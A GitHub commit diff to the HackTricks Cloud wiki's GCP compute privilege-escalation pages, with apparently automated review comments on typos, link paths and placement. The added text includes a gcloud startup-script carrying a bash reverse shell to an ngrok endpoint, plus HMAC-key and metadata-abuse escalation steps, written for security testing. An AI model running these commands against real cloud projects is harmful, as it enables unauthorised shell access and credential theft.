GITBOOK-627: No subject
carlospolop authored and gitbook-bot committed Jun 16, 2024
1 parent 5509686 commit 6743320
Showing 3 changed files with 41 additions and 16 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
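Review bot: The replacement line escapes the underscore in the link destination as well as in the link text (`https://twitter.com/hacktricks\_live`). The escape is only needed in the visible label; inside the URL it depends on the renderer un-escaping link destinations, and a renderer that does not will produce a broken link. Suggest keeping `\_` in the label and leaving the destination as `https://twitter.com/hacktricks_live`. The same applies to the identical header and footer lines changed elsewhere in this commit.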
Expand All @@ -22,6 +22,10 @@ For more information about Compute and VPC (netowork) in GCP check:
[gcp-compute-instances-enum](../../gcp-services/gcp-compute-instances-enum/)
{% endcontent-ref %}

{% hint style="danger" %}
Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached!
{% endhint %}

### `compute.projects.setCommonInstanceMetadata`

With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
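Review bot: In the new `hint` block, "atacks" is misspelled and "`actAs` permissions" does not name a permission a reader can search an IAM policy for. Suggest spelling it out as `iam.serviceAccounts.actAs` and rewording to "attacks that require modifying the instance metadata". The context line in the hunk header also carries "netowork", which could be fixed in the same pass.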
Expand All @@ -36,6 +40,16 @@ For more information about how to exploit this permission check:
[gcp-add-custom-ssh-metadata.md](gcp-add-custom-ssh-metadata.md)
{% endcontent-ref %}

You could aslo perform this attack by adding new startup-script and rebooting the instance:

```bash
gcloud compute instances add-metadata my-vm-instance \
--metadata startup-script='#!/bin/bash
bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &'

gcloud compute instances reset my-vm-instance
```

### `compute.instances.setMetadata`

This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**.
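Review bot: The added example is placed under `compute.projects.setCommonInstanceMetadata`, but the command it shows, `gcloud compute instances add-metadata my-vm-instance`, writes instance-level metadata, which is what the following `compute.instances.setMetadata` section covers. `gcloud compute instances reset` is also a separate action with its own permission that the text does not mention, and it is a hard reset rather than a clean reboot. Suggest moving the block under the instance-level heading and stating the extra requirement for the reset. Separately, "aslo" is a typo, and the hard-coded `0.tcp.eu.ngrok.io/18347` endpoint should be a placeholder such as `<host>/<port>`.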
Expand Down Expand Up @@ -88,12 +102,12 @@ Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to det

### Bypass Access Scopes

Following this link you find some [**ideas to try to bypass access scopes**](../../../gcp-security/gcp-privilege-escalation/).
Following this link you find some [**ideas to try to bypass access scopes**](../).

### Local Privilege Escalation in GCP Compute instance

{% content-ref url="../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}

## References
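Review bot: The "bypass access scopes" link now targets the bare directory `../`, while the `content-ref` directly below it targets an explicit file, `../gcp-local-privilege-escalation-ssh-pivoting.md`. A directory target only resolves where the renderer maps it to an index page; suggest pointing at the parent `README.md` explicitly, ideally with an anchor to the access-scopes section, so the link also works when the Markdown is browsed in the repository.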
Expand All @@ -109,7 +123,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Original file line number Diff line number Diff line change
Expand Up @@ -50,11 +50,14 @@ Cloud Storage's "interoperability" feature, designed for **cross-cloud interacti
gsutil hmac create <sa-email>

# Configure gsutil to use it
gsutil config -a
gcloud config set pass_credentials_to_gsutil false
gsutil config -a

# Use it
gsutil ls gs://[BUCKET_NAME]

# Restore
gcloud config set pass_credentials_to_gsutil true
```

Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
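Review bot: The `# Restore` step sets `pass_credentials_to_gsutil true` unconditionally, so a reader who had the property set to `false` (or unset) before following the steps ends up with a different configuration than they started with. Suggest a comment telling the reader to record the current value first, or restoring with `gcloud config unset pass_credentials_to_gsutil`. The new `gcloud config set pass_credentials_to_gsutil false` line also has no comment explaining why it is needed before `gsutil config -a`, and the restore does not mention that the HMAC key written by `gsutil config -a` stays in the boto configuration file afterwards.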
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Expand Down Expand Up @@ -97,8 +97,8 @@ gcloud compute disks get-iam-policy <disk>

For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges,** check this page:

{% content-ref url="../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
{% content-ref url="../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}

### Privilege Escalation
Expand All @@ -111,20 +111,20 @@ In the following page, you can check how to **abuse compute permissions to escal

### Unauthenticated Enum

{% content-ref url="../../../gcp-security/gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %}
[gcp-compute-unauthenticated-enum.md](../../../gcp-security/gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
{% content-ref url="../../gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %}
[gcp-compute-unauthenticated-enum.md](../../gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
{% endcontent-ref %}

### Post Exploitation

{% content-ref url="../../../gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md" %}
[gcp-compute-post-exploitation.md](../../../gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
{% content-ref url="../../gcp-post-exploitation/gcp-compute-post-exploitation.md" %}
[gcp-compute-post-exploitation.md](../../gcp-post-exploitation/gcp-compute-post-exploitation.md)
{% endcontent-ref %}

### Persistence

{% content-ref url="../../../gcp-security/gcp-persistence/gcp-compute-persistence.md" %}
[gcp-compute-persistence.md](../../../gcp-security/gcp-persistence/gcp-compute-persistence.md)
{% content-ref url="../../gcp-persistence/gcp-compute-persistence.md" %}
[gcp-compute-persistence.md](../../gcp-persistence/gcp-compute-persistence.md)
{% endcontent-ref %}

## Serial Console Logs
Expand All @@ -141,6 +141,14 @@ You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/r
gcloud compute instances get-serial-port-output <instance-name>
```

## Startup Scripts output

It's possible to see the **output of the statup scripts** from the VM executing:

```bash
sudo journalctl -u google-startup-scripts.service
```

## OS Configuration Manager

You can use the OS configuration management service to **deploy, query, and maintain consistent configurations** (desired state and software) for your VM instance (VM). On Compute Engine, you must use [guest policies](https://cloud.google.com/compute/docs/os-config-management#guest-policy) to maintain consistent software configurations on a VM.
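Review bot: In the new "Startup Scripts output" section, "statup" is misspelled and the heading capitalisation does not match the neighbouring "Serial Console Logs" and "OS Configuration Manager" headings. The sentence "from the VM executing" should also say explicitly that `sudo journalctl -u google-startup-scripts.service` is run inside the guest and applies to Linux images that ship this systemd unit, since the section directly above it documents a command run from outside the VM with `gcloud`.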
Expand Down Expand Up @@ -246,7 +254,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
